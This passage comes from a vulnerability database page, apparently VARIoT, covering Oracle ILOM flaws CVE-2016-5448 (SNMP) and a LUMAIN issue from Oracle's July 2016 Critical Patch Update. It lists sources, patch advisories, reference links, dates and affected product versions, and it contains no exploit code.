The 'SNMP' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation. A remote attacker could exploit this vulnerability to update, insert, or delete data, possibly causing a denial of service. Affect data integrity and availability", sources: [ { db: "NVD", id: "CVE-2016-5448", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5448", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "92008", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003876", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-812", trust: 0.7, }, { db: "VULHUB", id: "VHN-94267", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5448", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, id: "VAR-201607-0655", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94267", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:57:46.912000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Fixes for component security vulnerabilities", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63172", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5448", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5448", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/92008", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5448", }, { 
trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5448", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94267", }, { db: "VULMON", id: "CVE-2016-5448", }, { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, { db: "JVNDB", id: "JVNDB-2016-003876", }, { db: "CNNVD", id: "CNNVD-201607-812", }, { db: "NVD", id: "CVE-2016-5448", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94267", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5448", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92008", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003876", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-812", }, { date: "2016-07-21T10:15:03.867000", db: "NVD", id: "CVE-2016-5448", }, ], }, sources_update_date: { "@context": { "@vocab": 
"https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94267", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5448", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "92008", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003876", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-812", }, { date: "2024-11-21T02:54:20.170000", db: "NVD", id: "CVE-2016-5448", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In SNMP Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003876", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "92008", }, ], trust: 0.6, }, }
var-201607-0665
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to LUMAIN. A denial-of-service (DoS) attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle 
Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server. Exploiting the most severe of the vulnerabilities addressed by this update may potentially compromise the database server or the host operating system; that statement describes the update as a whole, not the ILOM issue specifically. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'Multiple' protocol. The 'LUMAIN' subcomponent is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a suite of Sun system products from Oracle Corporation.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0665", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", 
version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail 
integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy 
automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, 
